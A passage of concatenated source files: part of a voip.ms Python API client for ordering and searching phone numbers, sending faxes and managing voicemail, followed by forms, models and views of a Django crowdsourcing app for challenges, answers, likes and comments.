:param dialtime: [Required] Dial Time Out for the DID (Example: 60 -> in seconds)
:type dialtime: :py:class:`int`
:param cnam: [Required] CNAM for the DID (Boolean: True/False)
:type cnam: :py:class:`bool`
:param billing_type: [Required] Billing type for the DID (1 = Per Minute, 2 = Flat)
:type billing_type: :py:class:`int`
:param **kwargs: All optional parameters
:type **kwargs: :py:class:`dict`
:param failover_busy: Busy Routing for the DID
:type failover_busy: :py:class:`str`
:param failover_unreachable: Unreachable Routing for the DID
:type failover_unreachable: :py:class:`str`
:param failover_noanswer: NoAnswer Routing for the DID
:type failover_noanswer: :py:class:`str`
:param voicemail: Voicemail for the DID (Example: 101)
:type voicemail: :py:class:`int`
:param callerid_prefix: Caller ID Prefix for the DID
:type callerid_prefix: :py:class:`str`
:param note: Note for the DID
:type note: :py:class:`str`
:param test: Set to True if testing how Orders work
- Orders can not be undone
- When testing, no Orders are made
:type test: :py:class:`bool`
:returns: :py:class:`dict`
routing, failover_busy, failover_unreachable and failover_noanswer
can receive values in the following format => header:record_id
Where header could be: account, fwd, vm, sip, grp, ivr, sys, recording, queue, cb, tc, disa, none.
Examples:
account Used for routing calls to Sub Accounts
You can get all sub accounts using the accounts.get_sub_accounts function
fwd Used for routing calls to Forwarding entries.
You can get the ID right after creating a Forwarding with setForwarding
or by requesting all forwardings entries with getForwardings.
vm Used for routing calls to a Voicemail.
You can get all voicemails and their IDs using the voicemail.get_voicemails function
sys System Options:
hangup = Hangup the Call
busy = Busy tone
noservice = System Recording: Number not in service
disconnected = System Recording: Number has been disconnected
dtmf = DTMF Test
echo = ECHO Test
none Used to route calls to no action
Examples:
'account:100001_VoIP'
'fwd:1026'
'vm:101'
'none:'
'sys:echo'
"""
method = "backOrderDIDUSA"
kwargs.update({
"method": method,
"quantity": quantity,
"state": state,
"ratecenter": ratecenter,
"routing": routing,
"pop": pop,
"dialtime": dialtime,
"cnam": cnam,
"billing_type": billing_type,
})
return self._voipms_client._get(order(**kwargs))
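# Hedged usage sketch (not part of this module): the routing and failover parameters
# take 'header:record_id' strings as described in the docstrings above. Assuming an
# initialised client exposing this endpoint as `client.dids.back_order` (an
# assumption), and illustrative state/ratecenter values, a call might look like:
#
#   client.dids.back_order.back_order_did_usa(
#       quantity=1, state='NY', ratecenter='NEW YORK',
#       routing='account:100001_VoIP', pop=5, dialtime=60, cnam=True,
#       billing_type=2, failover_busy='vm:101', test=True)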
```
#### File: voipms/entities/didssearch.py
```python
from voipms.baseapi import BaseApi
class DidsSearch(BaseApi):
"""
Search for the Dids endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(DidsSearch, self).__init__(*args, **kwargs)
self.endpoint = 'dids'
def dids_can(self, type, query, province=None):
"""
Searches for Canadian DIDs by Province using a Search Criteria
:param type: [Required] Type of search (Values: 'starts', 'contains', 'ends')
:type type: :py:class:`str`
:param query: [Required] Query for searching (Examples: 'JOHN', '555', '123ABC')
:type query: :py:class:`str`
:param province: Canadian Province (Values from dids.get_provinces)
:type province: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "searchDIDsCAN"
if not isinstance(type, str):
raise ValueError("Type of search needs to be a str (Values: 'starts', 'contains', 'ends')")
if not isinstance(query, str):
raise ValueError("Query for searching needs to be a str (Examples: 'JOHN', '555', '123ABC')")
parameters = {
"type": type,
"query": query
}
if province:
if not isinstance(province, str):
raise ValueError("Canadian Province needs to be a str (Values from dids.get_provinces)")
else:
parameters["province"] = province
return self._voipms_client._get(method, parameters)
def dids_usa(self, type, query, state=None):
"""
Searches for USA DIDs by State using a Search Criteria
:param type: [Required] Type of search (Values: 'starts', 'contains', 'ends')
:type type: :py:class:`str`
:param query: [Required] Query for searching (Examples: 'JOHN', '555', '123ABC')
:type query: :py:class:`str`
        :param state: USA State (Values from dids.get_states)
:type state: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "searchDIDsUSA"
if not isinstance(type, str):
raise ValueError("Type of search needs to be a str (Values: 'starts', 'contains', 'ends')")
if not isinstance(query, str):
raise ValueError("Query for searching needs to be a str (Examples: 'JOHN', '555', '123ABC')")
parameters = {
"type": type,
"query": query
}
if state:
if not isinstance(state, str):
raise ValueError("United States State needs to be a str (Values from dids.get_states)")
else:
parameters["state"] = state
return self._voipms_client._get(method, parameters)
def toll_free_can_us(self, type=None, query=None):
"""
Searches for USA/Canada Toll Free Numbers using a Search Criteria
- Shows all USA/Canada Toll Free Numbers available if no criteria is provided.
:param type: Type of search (Values: 'starts', 'contains', 'ends')
:type type: :py:class:`str`
:param query: Query for searching (Examples: 'JOHN', '555', '123ABC')
:type query: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "searchTollFreeCanUS"
parameters = {}
if type:
if not isinstance(type, str):
raise ValueError("Type of search needs to be a str (Values: 'starts', 'contains', 'ends')")
else:
parameters["type"] = type
if query:
if not isinstance(query, str):
raise ValueError("Query for searching needs to be a str (Examples: 'JOHN', '555', '123ABC')")
else:
parameters["query"] = query
return self._voipms_client._get(method, parameters)
def toll_free_usa(self, type=None, query=None):
"""
Searches for USA Toll Free Numbers using a Search Criteria
- Shows all USA Toll Free Numbers available if no criteria is provided.
:param type: Type of search (Values: 'starts', 'contains', 'ends')
:type type: :py:class:`str`
:param query: Query for searching (Examples: 'JOHN', '555', '123ABC')
:type query: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "searchTollFreeUSA"
parameters = {}
if type:
if not isinstance(type, str):
raise ValueError("Type of search needs to be a str (Values: 'starts', 'contains', 'ends')")
else:
parameters["type"] = type
if query:
if not isinstance(query, str):
raise ValueError("Query for searching needs to be a str (Examples: 'JOHN', '555', '123ABC')")
else:
parameters["query"] = query
return self._voipms_client._get(method, parameters)
def vanity(self, type, query):
"""
        Searches for USA Toll Free Vanity Numbers using a Search Criteria
:param type: [Required] Type of Vanity Number (Values: '8**', '800', '855', '866', '877', '888')
:type type: :py:class:`str`
:param query: [Required] Query for searching : 7 Chars (Examples: '***JHON', '**555**', '**HELLO')
:type query: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "searchVanity"
if not isinstance(type, str):
raise ValueError("Type of Vanity Number needs to be a str (Values: '8**', '800', '855', '866', '877', '888')")
if not isinstance(query, str):
raise ValueError("Query for searching : 7 Chars needs to be a str (Examples: '***JHON', '**555**', '**HELLO')")
parameters = {
"type": type,
"query": query
}
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/faxsend.py
```python
from voipms.baseapi import BaseApi
from voipms.helpers import validate_email, convert_bool
class FaxSend(BaseApi):
"""
Send for the Fax endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(FaxSend, self).__init__(*args, **kwargs)
self.endpoint = 'fax'
def fax_message(self, to_number, from_name, from_number, file, **kwargs):
"""
Send a Fax message to a Destination Number
:param to_number: [Required] Destination DID Number (Example: 5552341234)
:type to_number: :py:class:`int`
:param from_name: [Required] Name of the sender
:type from_name: :py:class:`str`
:param from_number: [Required] DID number of the Fax sender (Example: 5552341234)
:type from_number: :py:class:`int`
:param file: [Required] The file must be encoded in Base64 and in one of the following formats: pdf, txt, jpg, gif, png, tif
:type file: :py:class:`str`
        :param send_email_enabled: Flag to enable sending a copy of your Fax via email (True/False, default False)
:type send_email_enabled: :py:class:`bool`
        :param send_email: Email address where you want to send a copy of your Fax.
:type send_email: :py:class:`str`
:param station_id: A word to identify a equipment or department sending the Fax
:type station_id: :py:class:`str`
        :param test: Set to True if testing how sending a Fax works (True/False)
:type test: :py:class:`bool`
:returns: :py:class:`dict`
"""
method = "sendFaxMessage"
if not isinstance(to_number, int):
raise ValueError("Destination DID Number needs to be an int (Example: 5552341234)")
if not isinstance(from_name, str):
raise ValueError("Name of the sender needs to be a str")
if not isinstance(from_number, int):
raise ValueError("DID number of the Fax sender needs to be an int (Example: 5552341234)")
if not isinstance(file, str):
raise ValueError("The file must be encoded in Base64 and in one of the following formats: pdf, txt, jpg, gif, png, tif and needs to be a str")
parameters = {
"to_number": to_number,
"from_name": from_name,
"from_number": from_number,
"file": file,
}
if "send_email_enabled" in kwargs:
if not isinstance(kwargs["send_email_enabled"], bool):
raise ValueError("Flag to enable the send of a copy of your Fax via email needs to be a bool (True/False default False)")
parameters["send_email_enabled"] = convert_bool(kwargs.pop("send_email_enabled"))
if "send_email" in kwargs:
send_email = kwargs.pop("send_email")
if not isinstance(send_email, str):
raise ValueError("Email address where you want send a copy of your Fax needs to be a str (Example: <EMAIL>)")
elif not validate_email(send_email):
raise ValueError("Email address where you want send a copy of your Fax is not a correct email syntax")
parameters["send_email"] = send_email
if "station_id" in kwargs:
if not isinstance(kwargs["station_id"], str):
raise ValueError("A word to identify a equipment or department sending the Fax needs to be a str")
parameters["station_id"] = kwargs.pop("station_id")
if "test" in kwargs:
if not isinstance(kwargs["test"], bool):
raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
else:
parameters["test"] = convert_bool(kwargs.pop("test"))
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
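# Hedged usage sketch (not part of this module): the `file` argument must be Base64
# text, so a document on disk has to be encoded first. Only the standard library is
# needed; the file name and the `client.fax.send` attribute path are assumptions:
#
#   import base64
#   with open('contract.pdf', 'rb') as fh:
#       encoded = base64.b64encode(fh.read()).decode('ascii')
#   client.fax.send.fax_message(5552341234, 'Sales Dept', 5559876543, encoded,
#                               station_id='FAX-01', test=True)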
```
#### File: voipms/entities/voicemaildelete.py
```python
from voipms.baseapi import BaseApi
class VoicemailDelete(BaseApi):
"""
Delete for the Voicemail endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(VoicemailDelete, self).__init__(*args, **kwargs)
self.endpoint = 'voicemail'
def messages(self, mailbox, **kwargs):
"""
Deletes all messages in all servers from a specific Voicemail from your Account
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:param folder: Name for specific Folder (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)
:type folder: :py:class:`str`
:param message_num: ID for specific Voicemail Message (Required if folder is passed, Example: 1)
:type message_num: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "delMessages"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
parameters = {
"mailbox": mailbox,
}
if "folder" in kwargs:
if not isinstance(kwargs["folder"], str):
raise ValueError("Name for specific Folder needs to be a str (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)")
parameters["folder"] = kwargs.pop("folder")
if "message_num" in kwargs:
if not isinstance(kwargs["message_num"], int):
raise ValueError("ID for specific Voicemail Message needs to be an int (Required if folder is passed, Example: 1)")
parameters["message_num"] = kwargs.pop("message_num")
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
def voicemail(self, mailbox):
"""
Deletes a specific Voicemail from your Account
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "delVoicemail"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
parameters = {
"mailbox": mailbox,
}
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/voicemailget.py
```python
from voipms.baseapi import BaseApi
from voipms.helpers import validate_date
class VoicemailGet(BaseApi):
"""
Get for the Voicemail endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(VoicemailGet, self).__init__(*args, **kwargs)
self.endpoint = 'voicemail'
def play_instructions(self, play_instructions=None):
"""
Retrieves a list of Play Instructions modes if no additional parameter is provided
- Retrieves a specific Play Instructions mode if a play code is provided
:param play_instructions: Code for a specific Play Instructions setting (Example: 'u')
:type play_instructions: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getPlayInstructions"
parameters = {
}
if play_instructions:
if not isinstance(play_instructions, str):
raise ValueError("Code for a specific Play Instructions setting needs to be a str (Example: 'u')")
else:
parameters["play_instructions"] = play_instructions
return self._voipms_client._get(method, parameters)
def timezones(self, timezone=None):
"""
Retrieves a list of Timezones if no additional parameter is provided
- Retrieves a specific Timezone if a timezone code is provided
:param timezone: Code for a specific Time Zone (Example: 'America/Buenos_Aires')
:type timezone: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getTimezones"
parameters = {
}
if timezone:
if not isinstance(timezone, str):
raise ValueError("Code for a specific Time Zone needs to be a str (Example: 'America/Buenos_Aires')")
else:
parameters["timezone"] = timezone
return self._voipms_client._get(method, parameters)
def voicemails(self, mailbox=None):
"""
Retrieves a list of Voicemails if no additional parameter is provided
- Retrieves a specific Voicemail if a voicemail code is provided
:param mailbox: ID for specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getVoicemails"
parameters = {
}
if mailbox:
if not isinstance(mailbox, int):
raise ValueError("ID for specific Mailbox needs to be an int (Example: 1001)")
else:
parameters["mailbox"] = mailbox
return self._voipms_client._get(method, parameters)
def voicemail_folders(self, folder=None):
"""
Retrieves a list of your Voicemail Folders if no additional parameter is provided
- Retrieves a specific Folder if a folder name is provided
:param folder: Folder Name (Example: 'INBOX')
:type folder: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getVoicemailFolders"
parameters = {
}
if folder:
if not isinstance(folder, str):
raise ValueError("Folder Name needs to be a str (Example: 'INBOX')")
else:
parameters["folder"] = folder
return self._voipms_client._get(method, parameters)
def voicemail_message_file(self, mailbox, folder, message_num):
"""
Retrieves a specific Voicemail Message File in Base64 format
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:param folder: [required] Name for specific Folder (Required if message id is passed, Example: 'INBOX', values from: voicemail.voicemail_folders)
:type folder: :py:class:`str`
:param message_num: [required] ID for specific Voicemail Message (Required if folder is passed, Example: 1)
:type message_num: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getVoicemailMessageFile"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
if not isinstance(folder, str):
raise ValueError("Name for specific Folder needs to be a str (Required if message id is passed, Example: 'INBOX', values from: voicemail.voicemail_folders)")
if not isinstance(message_num, int):
raise ValueError("ID for specific Voicemail Message needs to be an int (Required if folder is passed, Example: 1)")
parameters = {
"mailbox": mailbox,
"folder": folder,
"message_num": message_num,
}
return self._voipms_client._get(method, parameters)
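    # Hedged usage sketch (not part of this module): getVoicemailMessageFile returns
    # the recording as Base64 text, so saving it locally is a decode-and-write step.
    # The `client` variable, the attribute path and the 'data' response key are
    # assumptions for illustration:
    #
    #   import base64
    #   response = client.voicemail.get.voicemail_message_file(1001, 'INBOX', 1)
    #   with open('message_1.wav', 'wb') as fh:
    #       fh.write(base64.b64decode(response['data']))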
def voicemail_messages(self, mailbox, **kwargs):
"""
Retrieves a list of Voicemail Messages if mailbox parameter is provided
- Retrieves a list of Voicemail Messages in a Folder if a folder is provided
- Retrieves a list of Voicemail Messages in a date range if a from and to are provided
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:param folder: Name for specific Folder (Required if message id is passed, Example: 'INBOX', values from: voicemail.voicemail_folders)
:type folder: :py:class:`str`
:param date_from: Start Date for Filtering Voicemail Messages (Example: '2016-01-30')
:type date_from: :py:class:`str`
:param date_to: End Date for Filtering Voicemail Messages (Example: '2016-01-30')
:type date_to: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getVoicemailMessages"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
parameters = {
"mailbox": mailbox,
}
if "folder" in kwargs:
if not isinstance(kwargs["folder"], str):
raise ValueError("Name for specific Folder needs to be a str (Required if message id is passed, Example: 'INBOX', values from: voicemail.voicemail_folders)")
parameters["folder"] = kwargs.pop("folder")
if "date_from" in kwargs:
if not isinstance(kwargs["date_from"], str):
raise ValueError("Start Date for Filtering Voicemail Messages needs to be a str (Example: '2014-03-30')")
validate_date(kwargs["date_from"])
parameters["date_from"] = kwargs.pop("date_from")
if "date_to" in kwargs:
if not isinstance(kwargs["date_to"], str):
raise ValueError("End Date for Filtering Voicemail Messages needs to be a str (Example: '2014-03-30')")
validate_date(kwargs["date_to"])
parameters["date_to"] = kwargs.pop("date_to")
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/voicemailmove.py
```python
from voipms.baseapi import BaseApi
class VoicemailMove(BaseApi):
"""
Move for the Voicemail endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(VoicemailMove, self).__init__(*args, **kwargs)
self.endpoint = 'voicemail'
def folder_voicemail_message(self, mailbox, folder, message_num, new_folder):
"""
Move Voicemail Message to a Destination Folder
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:param folder: [required] Name for specific Folder (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)
:type folder: :py:class:`str`
:param message_num: [required] ID for specific Voicemail Message (Required if folder is passed, Example: 1)
:type message_num: :py:class:`int`
:param new_folder: [required] Destination Folder (Example: 'Urgent', values from: voicemail.get_voicemail_folders)
:type new_folder: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "moveFolderVoicemailMessage"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
if not isinstance(folder, str):
raise ValueError("Name for specific Folder needs to be a str (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)")
if not isinstance(message_num, int):
raise ValueError("ID for specific Voicemail Message needs to be an int (Required if folder is passed, Example: 1)")
if not isinstance(new_folder, str):
raise ValueError("Destination Folder needs to be a str (Example: 'Urgent', values from: voicemail.get_voicemail_folders)")
parameters = {
"mailbox": mailbox,
"folder": folder,
"message_num": message_num,
"new_folder": new_folder,
}
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/voicemailsend.py
```python
from voipms.baseapi import BaseApi
from voipms.helpers import validate_email
class VoicemailSend(BaseApi):
"""
Send for the Voicemail endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(VoicemailSend, self).__init__(*args, **kwargs)
self.endpoint = 'voicemail'
def voicemail_email(self, mailbox, folder, message_num, email_address):
"""
        Sends a specific Voicemail Message to a Destination Email address
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:param folder: [required] Name for specific Folder (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)
:type folder: :py:class:`str`
:param message_num: [required] ID for specific Voicemail Message (Required if folder is passed, Example: 1)
:type message_num: :py:class:`int`
:param email_address: [required] Destination Email address (Example: <EMAIL>)
:type email_address: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "sendVoicemailEmail"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
if not isinstance(folder, str):
raise ValueError("Name for specific Folder needs to be a str (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)")
if not isinstance(message_num, int):
raise ValueError("ID for specific Voicemail Message needs to be an int (Required if folder is passed, Example: 1)")
if not isinstance(email_address, str):
raise ValueError("Destination Email address needs to be a str (Example: <EMAIL>@my-domain.com)")
elif not validate_email(email_address):
raise ValueError("Destination Email address is not a correct email syntax")
parameters = {
"mailbox": mailbox,
"folder": folder,
"message_num": message_num,
"email_address": email_address,
}
return self._voipms_client._get(method, parameters)
``` |
{
"source": "4dragunov/Crowd",
"score": 2
} |
#### File: CrowdEngine/challenge/forms.py
```python
from django import forms
from .models import Category, Challenge, Answer, Comment
from django.core.exceptions import ValidationError
from time import time
class AnswerForm(forms.ModelForm):
class Meta:
model = Answer
fields = ['title', 'body']
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'}),
'body': forms.Textarea(attrs={'class': 'form-control'}),
}
labels = {
"title": "Основная идея",
"body": "Подробное описание"
}
class CategoryForm(forms.ModelForm):
class Meta:
model = Category
fields = ['title', 'slug'] #'__all__'
widgets = {
'title' : forms.TextInput(attrs={'class' : 'form-control'}),
'slug' : forms.TextInput(attrs={'class': 'form-control'})
}
def clean_slug(self):
new_slug = self.cleaned_data['slug'].lower()
if new_slug == 'create':
raise ValidationError('Адрес не может быть "Create"')
if Category.objects.filter(slug__iexact=new_slug).count():
raise ValidationError('Адрес уже существует. Он должен быть уникальным. У нас есть адрес "{}"'.format(new_slug))
return new_slug
class ChallengeForm(forms.ModelForm):
class Meta:
model = Challenge
fields = ['title', 'body', 'categories', 'prize', 'date_remaining', 'image']
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'}),
#'slug': forms.TextInput(attrs={'class': 'form-control'}),
'body' : forms.Textarea(attrs={'class': 'form-control'}),
'categories': forms.SelectMultiple(attrs={'class': 'form-control'}),
'prize': forms.TextInput(attrs={'class': 'form-control'}),
'date_remaining': forms.SelectDateWidget(attrs={'class': 'form-control'}),
}
labels = {
"title": "Тема",
"body": "Текст",
"categories": "Категория проблемы",
'prize':"Призовой фонд",
'date_remaining':"Дата завершения",
}
def clean_slug(self):
new_slug = self.cleaned_data['slug'].lower()
if new_slug == 'create':
raise ValidationError('Адрес не может быть "Create"')
return new_slug
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ("text",)
widgets = {
'text': forms.Textarea(),
}
labels = {
"text": "Текст"
}
```
#### File: CrowdEngine/challenge/models.py
```python
from django.db import models
from django.shortcuts import reverse, redirect
from django.utils.text import slugify
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.fields import GenericRelation
from time import time
from django.utils import timezone
User = get_user_model()
def gen_slug(s):
new_slug = (slugify(s, allow_unicode=True))
return new_slug + '-' + str(int(time()))
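# Example of the slug format this helper produces (the timestamp value below is
# assumed for illustration): gen_slug("My challenge") -> "my-challenge-1600000000".
# The time() suffix keeps slugs unique when two challenges share a title.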
class Challenge(models.Model):
title = models.CharField(max_length=150, db_index=True)
slug = models.SlugField(max_length=150, blank=True, unique=True)
body = models.TextField(blank=True, db_index=True)
date_pub = models.DateField(auto_now_add=True)
date_remaining = models.DateField(auto_now_add=False, blank=True, null=True)
prize = models.IntegerField(default=1000)
categories = models.ManyToManyField('Category', related_name='challenges')
challenge_author = models.ForeignKey(User, on_delete=models.CASCADE,
related_name="challenges", null=True)
image = models.ImageField(blank=True, upload_to='challenge/', null=True)
def __str__(self):
return self.title
def save(self, *args, **kwargs):
if not self.id:
self.slug = gen_slug(self.title)
super().save(*args, **kwargs)
    def days_remaining(self):
        days_remaining = self.date_remaining - self.date_pub
        return days_remaining.days
def get_absolute_url(self):
return reverse('challenge_detail_url', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('challenge_update_url', kwargs={'slug':self.slug})
def get_delete_url(self):
return reverse('challenge_delete_url', kwargs={'slug': self.slug})
class Answer(models.Model):
challenge = models.ForeignKey(Challenge, on_delete=models.SET_NULL, related_name='answers', null=True)
title = models.CharField(max_length=150, db_index=True)
#slug = models.ForeignKey(Challenge.slug, on_delete=models.SET_NULL, related_name='challenge_slug', null=True)
body = models.TextField(blank=True)
date_pub = models.DateField(auto_now_add=True)
author = models.ForeignKey(User, on_delete=models.CASCADE,
related_name="answers", null=True)
# answer_like = models.ManyToManyField(User, related_name='answer_liked', blank=True)
# answer_dislike = models.ManyToManyField(User, related_name='answer_disliked', blank=True)
def __str__(self):
return self.title
# def get_absolute_url(self):
# return reverse("blog_detail", args=[str(self.pk)])
def get_absolute_url(self):
return reverse('answer_detail_url', kwargs={'slug':
self.challenge.slug,
'pk': self.pk})
def get_answer_list(self):
return reverse('answers_list_url', kwargs={'slug': self.challenge.slug})
class AnswerLike(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE,
related_name="user_liked")
answer = models.ForeignKey(Answer, on_delete=models.CASCADE,
related_name="likes")
challenge = models.ForeignKey(Challenge, on_delete=models.CASCADE,
related_name='challenge', null=True, blank=True)
def __str__(self):
return self.user.username
class Category(models.Model):
title = models.CharField(max_length=50)
slug = models.SlugField(max_length=50, unique=True)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('category_detail_url', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('category_update_url', kwargs={'slug': self.slug})
def get_delete_url(self):
return reverse('category_delete_url', kwargs={'slug': self.slug})
class Comment(models.Model):
answer = models.ForeignKey(Answer, on_delete=models.CASCADE,
related_name='comments', null=True)
author = models.ForeignKey(User, on_delete=models.CASCADE,
related_name="comments", null=True)
text = models.TextField()
created = models.DateTimeField(auto_now_add=True)
# unique_together = ["post", "author"]
```
#### File: CrowdEngine/challenge/views.py
```python
from django.shortcuts import render, redirect, get_object_or_404, HttpResponse
from .models import Challenge, Category, Answer, AnswerLike, Comment
from django.views.generic import View
from .forms import CategoryForm, ChallengeForm, AnswerForm, CommentForm
from .utils import ObjectDetailMixin, ObjectUpdateMixin, ObjectDeleteMixin
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from django.contrib.auth.mixins import LoginRequiredMixin
from django.db.models import Count
from django.contrib.auth import get_user_model
from django.core.paginator import Paginator
from django.utils import timezone
User = get_user_model()
class AnswerCreate(View):
def get(self, request, slug):
challenge = Challenge.objects.get(slug__iexact=slug)
form = AnswerForm()
return render(request, 'challenge/answer_create.html', context={'form': form,
'challenge':challenge})
def post(self, request, slug):
challenge = Challenge.objects.get(slug__iexact=slug)
form = AnswerForm(request.POST)
if form.is_valid():
new_answer = form.save(commit=False)
new_answer.author = request.user
new_answer.challenge = challenge
new_answer.save()
return redirect('answers_list_url', challenge.slug)
return render(request, 'challenge/answer_create.html', context={'form': form,
'challenge':challenge})
def answerEdit(request, slug, pk):
is_form_edit = True
answer = get_object_or_404(Answer, challenge__slug=slug,
pk__iexact=pk)
challenge = get_object_or_404(Challenge, slug__iexact=slug)
if answer.author == request.user:
        form = AnswerForm(request.POST or None,
                          files=request.FILES or None, instance=answer)
        if form.is_valid():
            form.save()
            return redirect('answer_detail_url', slug, pk)
        # re-render the bound form so validation errors are not discarded
        return render(request, "challenge/answer_create.html",
                      context={'form': form,
                               "is_form_edit": is_form_edit,
                               'challenge': challenge})
else:
return redirect('main_url')
def answers_list(request, slug):
top_categories = Category.objects.all().annotate(cnt=Count('challenges')).order_by('-cnt')[:4]
top_challenges = Challenge.objects.order_by("answers")[:3]
challenge = get_object_or_404(Challenge,slug__iexact=slug)
answers = Answer.objects.filter(challenge__slug=slug).annotate(cnt=(
Count('likes'))).order_by('-cnt')
    paginator = Paginator(answers, 4)  # show 4 records per page
    page_number = request.GET.get('page')  # requested page number from the URL
    page = paginator.get_page(page_number)  # the records for that page
return render(request, 'challenge/answers_list.html',
context={'answers': answers,
'top_categories':top_categories,
'top_challenges':top_challenges,
'challenge':challenge,
'page':page,
'paginator':paginator})
def add_comment(request, slug, pk):
answer = get_object_or_404(Answer, pk=pk)
form = CommentForm(request.POST or None)
if form.is_valid():
new_comment = form.save(commit=False)
form.instance.author = request.user
form.instance.answer = answer
new_comment.save()
return redirect('answer_detail_url', slug, pk)
return render(request, "challenge/answer_detail.html", context={"form": form})
def del_comment(request, slug, pk, pk_comment):
answer = get_object_or_404(Answer, pk=pk)
comment = answer.comments.filter(pk=pk_comment)
comment.delete()
return redirect('answer_detail_url', slug, pk)
@login_required
def answerAddLike(request, slug, pk, url):
answer = get_object_or_404(Answer, pk=pk)
challenge = get_object_or_404(Challenge, slug__iexact=slug)
AnswerLike.objects.get_or_create(user=request.user, answer=answer,
challenge=challenge)
return redirect(url, slug=slug)
@login_required
def answerDelLike(request, slug, pk, url):
answer = get_object_or_404(Answer, pk=pk)
challenge = get_object_or_404(Challenge, slug__iexact=slug)
answer_like = AnswerLike.objects.get(user=request.user, answer=answer, challenge=challenge)
answer_like.delete()
return redirect(url, slug=slug)
def challenges_list(request):
user = request.user
challenges = Challenge.objects.all().order_by('-date_pub')
    paginator = Paginator(challenges, 4)  # show 4 records per page
    page_number = request.GET.get('page')  # requested page number from the URL
    page = paginator.get_page(page_number)  # the records for that page
top_challenges = Challenge.objects.order_by("answers")[:3]
#top_categories = Challenge.objects.all().annotate(cnt=Count('categories'))
top_categories = Category.objects.all().annotate(cnt=Count('challenges')).order_by('-cnt')[:4]
date = timezone.now().date()
return render(request, 'challenge/challenge_list.html',
context={'challenges': challenges,
'top_challenges' : top_challenges,
'top_categories' : top_categories,
'page': page, 'paginator': paginator,
'date':date,
'user':user
})
def challenge_detail(request, slug):
challenge = get_object_or_404(Challenge, slug__iexact=slug)
top_challenges = Challenge.objects.order_by("answers")[:3]
answers = Answer.objects.filter(challenge__slug=slug).annotate(cnt=(
Count('likes'))).order_by('-cnt')[:3]
top_categories = Category.objects.all().annotate(cnt=Count('challenges')).order_by('-cnt')[:4]
return render(request, 'challenge/challenge_detail.html',
context={'challenge': challenge,
'top_challenges' : top_challenges,
'top_categories' : top_categories,
'answers': answers,
})
def answer_detail(request, slug, pk):
answer = get_object_or_404(Answer, pk=pk)
challenge = get_object_or_404(Challenge, slug__iexact=slug)
top_challenges = Challenge.objects.order_by("answers")[:2]
top_categories = Category.objects.all().annotate(cnt=Count(
'challenges')).order_by('-cnt')[:3]
form = CommentForm()
items = answer.comments.all().order_by("-created")
return render(request, 'challenge/answer_detail.html',
context={'answer':answer,
